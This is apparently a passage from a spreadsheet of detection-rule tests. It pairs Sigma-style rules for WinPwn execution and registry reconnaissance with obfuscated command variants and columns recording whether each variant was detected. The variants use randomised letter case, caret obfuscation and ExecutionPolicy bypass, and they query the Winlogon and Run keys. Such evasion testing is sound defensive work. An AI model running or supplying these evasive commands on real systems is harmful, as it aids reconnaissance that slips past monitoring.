      <c r="J482" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K482" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="483" ht="15.75" customHeight="1" s="42">
      <c r="A483" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B483" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C483" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D483" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E483" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H483" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I483" s="43" t="n"/>
      <c r="J483" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K483" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="484" ht="15.75" customHeight="1" s="42">
      <c r="A484" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B484" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C484" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D484" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E484" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I484" s="43" t="n"/>
      <c r="J484" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K484" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="485" ht="15.75" customHeight="1" s="42">
      <c r="A485" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B485" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C485" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D485" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E485" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I485" s="43" t="n"/>
      <c r="J485" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K485" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="486" ht="15.75" customHeight="1" s="42">
      <c r="A486" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B486" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C486" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D486" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E486" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I486" s="43" t="n"/>
      <c r="J486" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K486" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="487" ht="15.75" customHeight="1" s="42">
      <c r="A487" s="43" t="n"/>
      <c r="B487" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C487" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D487" s="43" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E487" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set str1=gather &amp; set str2=NetworkInfo.vbs &amp; call wscript.exe C:\Windows\System32\%str1%%str2%"</t>
        </is>
      </c>
      <c r="F487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I487" s="43" t="n"/>
      <c r="J487" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K487" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="488" ht="15.75" customHeight="1" s="42">
      <c r="A488" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B488" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C488" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D488" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E488" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F488" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G488" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H488" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I488" s="43" t="n"/>
      <c r="J488" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K488" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="489" ht="15.75" customHeight="1" s="42">
      <c r="A489" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B489" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C489" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D489" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E489" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaNd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F489" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G489" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H489" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I489" s="43" t="n"/>
      <c r="J489" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K489" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="490" ht="15.75" customHeight="1" s="42">
      <c r="A490" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B490" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C490" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D490" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E490" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAnD "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F490" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G490" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H490" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I490" s="43" t="n"/>
      <c r="J490" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K490" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="491" ht="15.75" customHeight="1" s="42">
      <c r="A491" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B491" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C491" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D491" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E491" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F491" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G491" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H491" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I491" s="43" t="n"/>
      <c r="J491" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K491" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="492" ht="15.75" customHeight="1" s="42">
      <c r="A492" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B492" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C492" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D492" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E492" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnD "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F492" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G492" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H492" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I492" s="43" t="n"/>
      <c r="J492" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K492" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="493" ht="15.75" customHeight="1" s="42">
      <c r="A493" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B493" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C493" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D493" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E493" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmand "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F493" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G493" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H493" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I493" s="43" t="n"/>
      <c r="J493" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K493" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="494" ht="15.75" customHeight="1" s="42">
      <c r="A494" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B494" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C494" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D494" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E494" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F494" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G494" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H494" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I494" s="43" t="n"/>
      <c r="J494" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K494" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="495" ht="15.75" customHeight="1" s="42">
      <c r="A495" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B495" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C495" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D495" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E495" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F495" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G495" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H495" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I495" s="43" t="n"/>
      <c r="J495" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K495" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="496" ht="15.75" customHeight="1" s="42">
      <c r="A496" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B496" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C496" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D496" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E496" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaNd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F496" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G496" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H496" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I496" s="43" t="n"/>
      <c r="J496" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K496" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="497" ht="15.75" customHeight="1" s="42">
      <c r="A497" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B497" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C497" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D497" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E497" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F497" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G497" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H497" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I497" s="43" t="n"/>
      <c r="J497" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K497" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="498" ht="15.75" customHeight="1" s="42">
      <c r="A498" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B498" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C498" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D498" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E498" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F498" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G498" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H498" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I498" s="43" t="n"/>
      <c r="J498" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K498" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="499" ht="15.75" customHeight="1" s="42">
      <c r="A499" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B499" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C499" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D499" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E499" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMANd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F499" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G499" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H499" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I499" s="43" t="n"/>
      <c r="J499" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K499" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="500" ht="15.75" customHeight="1" s="42">
      <c r="A500" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B500" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C500" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D500" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E500" s="36" t="inlineStr">
        <is>
          <t>reg.exe qu^ery "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"</t>
        </is>
      </c>
      <c r="F500" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G500" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H500" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I500" s="36" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J500" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K500" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="501" ht="15.75" customHeight="1" s="42">
      <c r="A501" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B501" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C501" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D501" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E501" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F501" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G501" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H501" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I501" s="43" t="n"/>
      <c r="J501" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K501" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="502" ht="15.75" customHeight="1" s="42">
      <c r="A502" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B502" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C502" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D502" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E502" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaNd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F502" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G502" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H502" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I502" s="43" t="n"/>
      <c r="J502" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K502" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="503" ht="15.75" customHeight="1" s="42">
      <c r="A503" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B503" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C503" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D503" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E503" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAnD "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F503" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G503" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H503" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I503" s="43" t="n"/>
      <c r="J503" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K503" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="504" ht="15.75" customHeight="1" s="42">
      <c r="A504" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B504" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C504" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D504" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E504" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F504" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G504" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H504" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I504" s="43" t="n"/>
      <c r="J504" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K504" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="505" ht="15.75" customHeight="1" s="42">
      <c r="A505" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B505" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C505" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D505" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E505" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnD "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F505" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G505" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H505" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I505" s="43" t="n"/>
      <c r="J505" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K505" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="506" ht="15.75" customHeight="1" s="42">
      <c r="A506" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B506" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C506" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D506" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E506" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmand "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F506" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G506" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H506" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I506" s="43" t="n"/>
      <c r="J506" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K506" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="507" ht="15.75" customHeight="1" s="42">
      <c r="A507" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B507" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C507" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D507" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E507" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F507" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G507" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H507" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I507" s="43" t="n"/>
      <c r="J507" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K507" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="508" ht="15.75" customHeight="1" s="42">
      <c r="A508" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B508" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C508" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D508" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E508" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F508" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G508" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H508" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I508" s="43" t="n"/>
      <c r="J508" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K508" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="509" ht="15.75" customHeight="1" s="42">
      <c r="A509" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B509" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C509" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D509" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E509" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaNd "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F509" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G509" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H509" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I509" s="43" t="n"/>
